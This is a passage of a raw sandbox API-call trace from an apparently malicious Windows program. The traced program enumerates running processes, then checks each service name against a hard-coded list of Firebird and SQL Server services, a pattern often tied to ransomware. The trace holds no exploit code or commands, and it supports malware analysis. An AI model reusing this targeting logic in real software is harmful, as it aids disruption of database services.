th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.534] lstrlenW (lpString="svchost.exe") returned 11 [0210.534] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0210.535] lstrlenW (lpString="Pg.exe") returned 6 [0210.535] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0210.536] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0210.536] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0210.537] lstrlenW (lpString="conhost.exe") returned 11 [0210.537] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0210.537] lstrlenW (lpString="cmd.exe") returned 7 [0210.538] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0210.538] lstrlenW (lpString="conhost.exe") returned 11 [0210.538] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0210.539] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0210.539] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 0 [0210.540] CloseHandle (hObject=0x43c) returned 1 [0210.540] Sleep (dwMilliseconds=0x1f4) [0211.043] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236b990 [0211.044] EnumServicesStatusExW (in: hSCManager=0x236b990, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0211.044] GetLastError () returned 0xea [0211.044] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x40f9e88 [0211.044] EnumServicesStatusExW (in: hSCManager=0x236b990, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x40f9e88, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x40f9e88, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0211.045] CloseServiceHandle (hSCObject=0x236b990) returned 1 [0211.045] lstrlenW (lpString="Appinfo") returned 7 [0211.045] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0211.045] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0211.045] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0211.045] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0211.045] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0211.045] lstrlenW (lpString="AppXSvc") returned 7 [0211.045] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0211.045] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0211.045] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0211.045] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0211.045] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0211.045] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0211.045] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0211.045] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0211.045] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0211.046] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0211.046] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0211.046] lstrlenW (lpString="Audiosrv") returned 8 [0211.046] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0211.046] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0211.046] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0211.046] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0211.046] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0211.046] lstrlenW (lpString="BFE") returned 3 [0211.046] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0211.046] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0211.046] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0211.046] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0211.046] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0211.046] lstrlenW (lpString="BITS") returned 4 [0211.046] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0211.046] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0211.046] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0211.046] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0211.046] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0211.046] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0211.046] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0211.046] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0211.046] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0211.046] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0211.046] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0211.046] lstrlenW (lpString="CDPSvc") returned 6 [0211.046] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0211.046] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0211.046] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0211.046] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0211.047] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0211.047] lstrlenW (lpString="ClickToRunSvc") returned 13 [0211.047] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0211.047] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0211.047] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0211.047] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0211.047] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0211.047] lstrlenW (lpString="ClipSVC") returned 7 [0211.047] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0211.047] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0211.047] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0211.047] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0211.047] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0211.047] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0211.047] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0211.047] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0211.047] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0211.047] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0211.047] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0211.047] lstrlenW (lpString="CryptSvc") returned 8 [0211.047] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0211.047] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0211.047] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0211.047] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0211.047] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0211.047] lstrlenW (lpString="DcomLaunch") returned 10 [0211.047] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0211.047] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0211.047] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0211.047] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0211.047] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0211.048] lstrlenW (lpString="DeviceAssociationService") returned 24 [0211.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0211.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0211.048] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0211.048] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0211.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0211.048] lstrlenW (lpString="Dhcp") returned 4 [0211.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0211.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0211.048] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0211.048] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0211.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0211.048] lstrlenW (lpString="Dnscache") returned 8 [0211.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0211.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0211.048] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0211.048] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0211.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0211.048] lstrlenW (lpString="DoSvc") returned 5 [0211.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0211.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0211.048] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0211.048] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0211.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0211.048] lstrlenW (lpString="DPS") returned 3 [0211.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0211.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0211.048] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0211.048] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0211.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0211.048] lstrlenW (lpString="DusmSvc") returned 7 [0211.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0211.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0211.049] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0211.049] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0211.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0211.049] lstrlenW (lpString="EventLog") returned 8 [0211.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0211.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0211.049] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0211.049] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0211.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0211.049] lstrlenW (lpString="EventSystem") returned 11 [0211.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0211.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0211.049] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0211.049] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0211.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0211.049] lstrlenW (lpString="FontCache") returned 9 [0211.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0211.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0211.049] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0211.049] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0211.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0211.049] lstrlenW (lpString="gpsvc") returned 5 [0211.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0211.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0211.049] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0211.049] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0211.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0211.049] lstrlenW (lpString="iphlpsvc") returned 8 [0211.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0211.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0211.050] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0211.050] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0211.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0211.050] lstrlenW (lpString="KeyIso") returned 6 [0211.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0211.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0211.050] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0211.050] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0211.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0211.050] lstrlenW (lpString="LanmanServer") returned 12 [0211.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0211.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0211.050] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0211.050] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0211.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0211.050] lstrlenW (lpString="LanmanWorkstation") returned 17 [0211.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0211.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0211.050] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0211.050] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0211.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0211.050] lstrlenW (lpString="lfsvc") returned 5 [0211.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0211.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0211.050] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0211.050] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0211.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0211.050] lstrlenW (lpString="LicenseManager") returned 14 [0211.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0211.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0211.050] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0211.050] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0211.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0211.051] lstrlenW (lpString="lmhosts") returned 7 [0211.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0211.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0211.051] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0211.051] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0211.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0211.051] lstrlenW (lpString="LSM") returned 3 [0211.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0211.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0211.051] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0211.051] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0211.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0211.051] lstrlenW (lpString="MpsSvc") returned 6 [0211.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0211.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0211.051] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0211.051] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0211.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0211.051] lstrlenW (lpString="NcbService") returned 10 [0211.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0211.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0211.051] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0211.051] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0211.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0211.051] lstrlenW (lpString="netprofm") returned 8 [0211.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0211.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0211.051] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0211.051] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0211.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0211.052] lstrlenW (lpString="NlaSvc") returned 6 [0211.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0211.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0211.052] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0211.052] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0211.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0211.052] lstrlenW (lpString="nsi") returned 3 [0211.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0211.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0211.052] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0211.052] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0211.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0211.052] lstrlenW (lpString="PcaSvc") returned 6 [0211.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0211.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0211.052] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0211.052] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0211.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0211.052] lstrlenW (lpString="PlugPlay") returned 8 [0211.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0211.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0211.052] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0211.052] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0211.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0211.052] lstrlenW (lpString="Power") returned 5 [0211.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0211.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0211.052] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0211.052] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0211.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0211.052] lstrlenW (lpString="ProfSvc") returned 7 [0211.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0211.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0211.053] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0211.053] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0211.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0211.053] lstrlenW (lpString="RpcEptMapper") returned 12 [0211.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0211.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0211.053] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0211.053] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0211.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0211.053] lstrlenW (lpString="RpcSs") returned 5 [0211.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0211.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0211.053] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0211.053] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0211.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0211.053] lstrlenW (lpString="SamSs") returned 5 [0211.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0211.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0211.053] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0211.053] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0211.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0211.053] lstrlenW (lpString="Schedule") returned 8 [0211.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0211.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0211.053] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0211.053] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0211.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0211.053] lstrlenW (lpString="SecurityHealthService") returned 21 [0211.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0211.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0211.054] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0211.054] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0211.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0211.054] lstrlenW (lpString="SENS") returned 4 [0211.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0211.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0211.054] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0211.054] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0211.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0211.054] lstrlenW (lpString="ShellHWDetection") returned 16 [0211.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0211.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0211.054] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0211.054] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0211.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0211.054] lstrlenW (lpString="Spooler") returned 7 [0211.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0211.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0211.054] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0211.054] lstrcmpiW 